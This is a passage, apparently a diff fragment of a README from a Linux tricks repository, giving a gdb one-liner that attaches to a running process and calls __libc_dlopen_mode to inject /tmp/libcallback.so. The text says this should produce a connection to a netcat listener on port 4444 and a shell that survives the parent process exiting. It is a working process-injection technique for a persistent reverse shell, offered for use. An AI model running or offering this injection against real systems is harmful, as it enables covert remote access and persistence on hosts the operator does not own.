billchaison/Linux-Trix/README.md

 (e.g. PID selected is 2739)<br />
 `echo 'print __libc_dlopen_mode("/tmp/libcallback.so", 2)' | gdb -p 2739`

 You should see a connection to your netcat session listening on port 4444.
+You should not lose your shell even if the parent process exits.